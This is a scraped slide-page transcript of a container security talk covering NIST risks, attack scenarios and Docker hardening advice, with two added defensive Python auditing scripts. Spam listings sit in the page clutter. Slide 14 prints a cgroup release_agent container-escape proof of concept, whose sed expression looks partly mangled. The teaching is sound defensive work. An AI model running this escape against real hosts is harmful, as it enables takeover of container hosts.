WhatsApp Spy Online Trackers and Monitoring Apps
HackersList
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...
alexjohnson7307
 
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
(CISOPlatform Summit & SACON 2024) Keynote _ Power Digital Identities With AI...
Priyanka Aash
 
Acumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptxAcumatica vs. Sage Intacct _Construction_July (1).pptx
Acumatica vs. Sage Intacct _Construction_July (1).pptx
BrainSell Technologies
 
Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf
Tatiana Al-Chueyr
 
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
Russian Girls Call Navi Mumbai 🎈🔥9920725232 🔥💋🎈 Provide Best And Top Girl Ser...
bellared2
 
Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10Computer HARDWARE presenattion by CWD students class 10
Computer HARDWARE presenattion by CWD students class 10
ankush9927
 
Opencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of MünsterOpencast Summit 2024 — Opencast @ University of Münster
Opencast Summit 2024 — Opencast @ University of Münster
Matthias Neugebauer
 
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfBT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
Neo4j
 
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
(CISOPlatform Summit & SACON 2024) Orientation by CISO Platform_ Using CISO P...
Priyanka Aash
 
Integrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecaseIntegrating Kafka with MuleSoft 4 and usecase
Integrating Kafka with MuleSoft 4 and usecase
shyamraj55
 

Recently uploaded (20)

(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
(CISOPlatform Summit & SACON 2024) Gen AI & Deepfake In Overall Security.pdf
 
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptxDublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
Dublin_mulesoft_meetup_Mulesoft_Salesforce_Integration (1).pptx
 
What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024What's new in android: jetpack compose 2024
What's new in android: jetpack compose 2024
 
Mastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for SuccessMastering OnlyFans Clone App Development: Key Strategies for Success
Mastering OnlyFans Clone App Development: Key Strategies for Success
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
 
Semantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software DevelopmentSemantic-Aware Code Model: Elevating the Future of Software Development
Semantic-Aware Code Model: Elevating the Future of Software Development
 
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
Premium Girls Call Mumbai 9920725232 Unlimited Short Providing Girls Service ...
 
Tailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer InsightsTailored CRM Software Development for Enhanced Customer Insights
Tailored CRM Software Development for Enhanced Customer Insights
 
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptxIntroduction-to-the-IAM-Platform-Implementation-Plan.pptx
Introduction-to-the-IAM-Platform-Implementation-Plan.pptx
 
WhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring AppsWhatsApp Spy Online Trackers and Monitoring Apps
WhatsApp Spy Online Trackers and Monitoring Apps
 
leewayhertz.com-AI agents for healthcare Applications benefits and implementa...

Container Security

  • 1. Container Security. Jie @ InfoSec2020, Nov/02/2020
  • 2. curl -X GET https://2130706433/info
    {
      "Name": "Jie",
      "Experience": ["IBM Security", "Qualcomm", "National Center of High-Performance Computing"],
      "Certification": ["CCIE #50382", "OSCP", "CEH"]
    }
    https://www.linkedin.com/in/jieliau
    https://github.com/jieliau
    https://www.facebook.com/jie.liau
    https://twitter.com/0xJieLiau
    https://medium.com/@liau.weijie
  • 3. Gartner predicts that by 2023, 70% of organizations will be running three or more containerized applications in production
  • 4. ?
  • 5. (Diagram: virtual machines vs. containers. VM stack: Infrastructure, Hypervisor, then per VM a Guest OS, Bin/Lib and App. Container stack: Infrastructure, Host OS, Container Engine, then per containerized application only Bin/Lib and App.)
  • 6. Open Container Initiative (OCI)
    • Runtime Spec
      • namespace
      • cgroups
    • Image Spec
      • Layer
      • Image index
      • Configuration
  • 11. Security issues by layer (NIST SP 800-190)
    • Host OS risks
      • Improper user access rights
      • OS vulnerabilities
    • Orchestration system risks
      • Unbounded admin access
      • Weak or unmanaged credentials
      • Unmanaged inter-container network traffic
      • Mixed workload sensitivity levels
    • Registry risks
      • Insecure connections to registries
      • Stale images in registries
    • Image risks
      • Image vulnerabilities
      • Image configuration
      • Embedded malware
      • Embedded secrets
      • Image trust
    • Container runtime risks
      • Vulnerabilities within the runtime software
      • Unbounded network access from containers
      • Insecure container runtime configurations
      • Shared kernel
    https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-190.pdf
  • 13. Containers should not run as root. Use a non-root user in your Dockerfile.
  • 14. Privileged containers are so bad. Proof of concept from the referenced tweet (cgroup release_agent escape from a privileged container), as printed on the slide:
    d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
    mkdir -p $d/w;echo 1 >$d/w/notify_on_release
    t=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab`
    touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
    $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
    https://twitter.com/_fel1x/status/1151487051986087936
  • 16. Open Docker API (Diagram: a Docker host exposing its API; labels: Docker host, Client Host, Geek)
  • 17. Attack Scenario I: Vulnerable Container (Docker Host or K8s Cluster)
    1. Attack vulnerable container
    2. Compromise the host
  • 18. Attack Scenario II: Bad Container (Docker Host or K8s cluster)
    1. Push bad image
    2. Deploy by admin
    3. Create bad container
  • 19. Attack Scenario III: Privileged Container (Open Docker Host)
    1. Find out open docker host
    2. Create privileged container
    3. Compromise the host
  • 20. Bad Image for Cryptocurrency Mining https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
  • 21. Kinsing Malware Attacks Targeting Container Env https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability
  • 24. Docker security best practices
    • Always use the most up-to-date version of Docker
    • Allow only trusted users control of the Docker daemon by making sure only trusted users are members of the docker group
    • Run your containers as a non-root user (UID not 0)
    • Use only trusted base images when building your containers
    • Use minimal base images that don't include unnecessary software packages, which would enlarge the attack surface
    • Don't store secrets in images/Dockerfiles
    • When running containers, remove all capabilities not required for the container to function
    • Don't run containers with the --privileged flag
    • Don't mount sensitive host system directories into containers, especially in writable mode: a container that can change them can compromise the host
    • Don't run sshd within containers
    • Don't map any ports below 1024 within a container; they are considered privileged because they transmit sensitive data
    • Make sure you have rules in place that give you an audit trail for the Docker daemon and Docker files and directories:
      • /var/lib/docker
      • /etc/docker
      • docker.service
      • docker.socket
      • /etc/default/docker
      • /etc/docker/daemon.json
      • /etc/sysconfig/docker
      • /usr/bin/containerd
      • /usr/sbin/runc
    https://www.stackrox.com/post/2019/09/docker-security-101/
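Several of the build-time rules above (non-root USER, trusted and pinned base images, no secrets in the Dockerfile, no sshd, no ports below 1024) can be checked mechanically before an image is built. The following is an added example, not code from the deck or any project it cites: a small Dockerfile linter in Python. The two sample Dockerfiles are constructed for the example, and the sha256 digest in the good one is an all-zero placeholder, not a real image digest.

```python
"""Build-time checks on a Dockerfile for the practices listed on the slide above."""
import re

# Constructed sample Dockerfiles (not from any real project): one breaking several rules, one following them.
SAMPLE_BAD_DOCKERFILE = """\
FROM ubuntu:latest
ENV DB_PASSWORD=hunter2
RUN apt-get update && \\
    apt-get install -y openssh-server
EXPOSE 22
EXPOSE 8080
COPY app /app
CMD ["/app/run"]
"""

# The digest is a placeholder (64 zeros); a real one comes from `docker pull` / the registry.
SAMPLE_GOOD_DOCKERFILE = "FROM python:3.12-slim@sha256:" + "0" * 64 + "\n" + """\
RUN useradd --system --uid 10001 --no-create-home app
COPY app /app
EXPOSE 8080
USER app
CMD ["/app/run"]
"""

SECRET_KEY = re.compile(r"PASSWORD|PASSWD|SECRET|TOKEN|API_KEY|PRIVATE_KEY", re.I)
SSHD = re.compile(r"\b(openssh-server|sshd|dropbear)\b")


def parse_dockerfile(text):
    """Return (INSTRUCTION, argument) pairs; joins backslash-continued lines, skips blanks and comments."""
    pairs, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        parts = (buf + line).split(None, 1)
        pairs.append((parts[0].upper(), parts[1] if len(parts) > 1 else ""))
        buf = ""
    return pairs


def base_image_pinned(image):
    """True if FROM references a digest or a tag other than 'latest' (or the empty 'scratch' image)."""
    if image == "scratch" or "@sha256:" in image:
        return True
    # Look only at the last path component so a port in the registry host is not mistaken for a tag.
    last = image.rsplit("/", 1)[-1]
    return ":" in last and not last.endswith(":latest")


def lint_dockerfile(text):
    """Return a list of human-readable findings; an empty list means every check passed."""
    findings = []
    last_user = None
    for instr, arg in parse_dockerfile(text):
        if instr == "FROM":
            image = arg.split()[0]  # drop any "AS stage" suffix
            if not base_image_pinned(image):
                findings.append(f"FROM {image}: base image not pinned to a tag or digest")
        elif instr in ("ENV", "ARG"):
            # Handles both KEY=value and the older "ENV KEY value" form.
            keys = re.findall(r"([A-Za-z_][A-Za-z0-9_]*)=", arg) or arg.split()[:1]
            for key in keys:
                if SECRET_KEY.search(key):
                    findings.append(f"{instr} {key}: secret-looking value baked into the image")
        elif instr == "EXPOSE":
            for spec in arg.split():
                port = spec.split("/")[0]
                if port.isdigit() and int(port) < 1024:
                    findings.append(f"EXPOSE {spec}: port below 1024 is privileged")
        elif instr == "RUN" and SSHD.search(arg):
            findings.append("RUN installs an SSH server inside the image")
        elif instr == "USER":
            last_user = arg.split(":")[0]
    # Only the last USER instruction matters: it is the identity CMD/ENTRYPOINT run with.
    if last_user in (None, "", "root", "0"):
        findings.append("no non-root USER: processes in the container will run as root")
    return findings


if __name__ == "__main__":
    for name, text in (("bad", SAMPLE_BAD_DOCKERFILE), ("good", SAMPLE_GOOD_DOCKERFILE)):
        print(name, lint_dockerfile(text) or "OK")
```

Run it against a real Dockerfile by passing `open("Dockerfile").read()` to `lint_dockerfile`; the checks are deliberately conservative (pattern matching on instruction text), so treat a finding as something to look at rather than proof of a defect.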
  • 25. --cap-add instead of --privileged
    • --cap-add
      • SYS_ADMIN
      • NET_ADMIN
      • MAC_ADMIN
      • NET_RAW
      • SYS_TIME
      • SYSLOG
      • ...
    https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
  • 26. Limit Resource Usage
    • --memory
    • --cpus
    • --cpu-period
    • --pids-limit
    • --kernel-memory
    • --device-read-bps
    • --device-read-iops
    • --device-write-bps
    • --device-write-iops
    https://docs.docker.com/config/containers/resource_constraints/
  • 27. Open Source Tools for Docker Security
    • Docker Bench for Security
    • Clair
    • Cilium
    • Anchore
    • OpenSCAP Workbench
    • Dagda
    • Notary
    • Grafeas
    • Sysdig Falco
    • Banyanops Collector
    https://techbeacon.com/security/10-top-open-source-tools-docker-security
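The runtime-side rules from slides 24 to 26 (no --privileged, minimal --cap-add on top of --cap-drop ALL, memory/CPU/PID limits, no sensitive host directories bind-mounted, non-root user) are all visible in the HostConfig and Config sections that `docker inspect` prints. The following is an added example, not code from the deck or any project it cites: a Python audit over that JSON. The two inspect documents are constructed samples in the shape of real `docker inspect` output, with placeholder container IDs; the set of capabilities treated as high risk is the list slide 25 names.

```python
"""Audit a container's runtime configuration (shape of `docker inspect` output) against the deck's flags."""
import json

# Capabilities slide 25 singles out; each is close to, or a step toward, root on the host.
HIGH_RISK_CAPS = {"SYS_ADMIN", "NET_ADMIN", "MAC_ADMIN", "NET_RAW", "SYS_TIME", "SYSLOG"}
# Host paths whose contents hand control of the host to the container when mounted.
SENSITIVE_HOST_PATHS = ("/etc", "/proc", "/sys", "/boot", "/dev", "/root",
                        "/var/lib/docker", "/var/run/docker.sock", "/run/docker.sock")


def is_sensitive_host_path(path):
    """True for '/', a sensitive directory, or anything beneath one."""
    return path == "/" or any(path == p or path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_container(inspect_output):
    """Return findings for one container; `inspect_output` is the JSON text `docker inspect <id>` prints."""
    data = json.loads(inspect_output)
    container = data[0] if isinstance(data, list) else data
    hc = container.get("HostConfig") or {}
    cfg = container.get("Config") or {}
    findings = []

    if hc.get("Privileged"):
        findings.append("--privileged: all capabilities and host devices; replace with --cap-add of the few needed")
    if "ALL" not in (hc.get("CapDrop") or []):
        findings.append("default capability set kept; start from --cap-drop ALL and add back what is required")
    for cap in hc.get("CapAdd") or []:
        name = cap[4:] if cap.startswith("CAP_") else cap  # accept both SYS_ADMIN and CAP_SYS_ADMIN
        if name in HIGH_RISK_CAPS:
            findings.append(f"--cap-add {name}: high-risk capability granted")

    if not hc.get("Memory"):
        findings.append("no memory limit (--memory)")
    if not (hc.get("NanoCpus") or hc.get("CpuQuota")):
        findings.append("no CPU limit (--cpus, or --cpu-period with --cpu-quota)")
    pids = hc.get("PidsLimit")
    if pids is None or pids <= 0:  # null, 0 and -1 all mean unlimited
        findings.append("no PID limit (--pids-limit); unbounded process creation can exhaust the host")

    for bind in hc.get("Binds") or []:  # "host_src:container_dst[:options]"
        parts = bind.split(":")
        src, dst = parts[0], parts[1] if len(parts) > 1 else "?"
        mode = parts[2] if len(parts) > 2 else "rw"
        if is_sensitive_host_path(src):
            writable = "ro" not in mode.split(",")
            findings.append(f"bind {src} -> {dst}: sensitive host path mounted "
                            + ("writable" if writable else "read-only"))

    user = (cfg.get("User") or "").split(":")[0]
    if user in ("", "root", "0"):
        findings.append("runs as root (Config.User unset); build the image with a non-root USER or pass --user")
    return findings


# Constructed samples in the shape of `docker inspect` output; not captured from a real host.
SAMPLE_BAD = json.dumps([{
    "Id": "constructed-id-0000",
    "Name": "/legacy-app",
    "Config": {"User": ""},
    "HostConfig": {
        "Privileged": True,
        "CapAdd": ["SYS_ADMIN", "NET_RAW"],
        "CapDrop": None,
        "Memory": 0, "NanoCpus": 0, "CpuQuota": 0, "PidsLimit": None,
        "Binds": ["/var/run/docker.sock:/var/run/docker.sock", "/etc:/host-etc", "/srv/data:/data:ro"],
    },
}])

SAMPLE_HARDENED = json.dumps([{
    "Id": "constructed-id-0001",
    "Name": "/webapp",
    "Config": {"User": "10001:10001"},
    "HostConfig": {
        "Privileged": False,
        "CapAdd": ["NET_BIND_SERVICE"],
        "CapDrop": ["ALL"],
        "Memory": 268435456, "NanoCpus": 500000000, "PidsLimit": 100,
        "Binds": ["/srv/data:/data:ro"],
    },
}])

if __name__ == "__main__":
    for label, doc in (("legacy-app", SAMPLE_BAD), ("webapp", SAMPLE_HARDENED)):
        print(label, audit_container(doc) or "OK")
```

On a real host, feed it `subprocess.run(["docker", "inspect", name], capture_output=True, text=True).stdout`; the hardened sample corresponds to a run line of the form `docker run --user 10001:10001 --cap-drop ALL --cap-add NET_BIND_SERVICE --memory 256m --cpus 0.5 --pids-limit 100 -v /srv/data:/data:ro ...`, which is the shape the deck recommends.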
  • 29. Container Visibility is So Damn Important https://blog.gigamon.com/2019/09/19/if-you-dont-have-container-visibility-your-organization-is-at-risk/
  • 32. References
    • https://www.stackrox.com/post/2020/03/6-container-adoption-trends-of-2020/
    • https://www.docker.com/blog/containers-replacing-virtual-machines/
    • https://blog.aquasec.com/cve-2016-9962-run-container-run
    • https://medium.com/@mccode/processes-in-containers-should-not-run-as-root-2feae3f0df3b
    • https://containerjournal.com/topics/container-security/why-running-a-privileged-container-is-not-a-good-idea/
    • https://docs.docker.com/engine/api/
    • https://docs.docker.com/engine/api/v1.40/#operation/ContainerCreate
    • https://www.trendmicro.com/vinfo/tw/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining
    • https://docs.docker.com/config/containers/resource_constraints/
    • https://techbeacon.com/security/10-top-open-source-tools-docker-security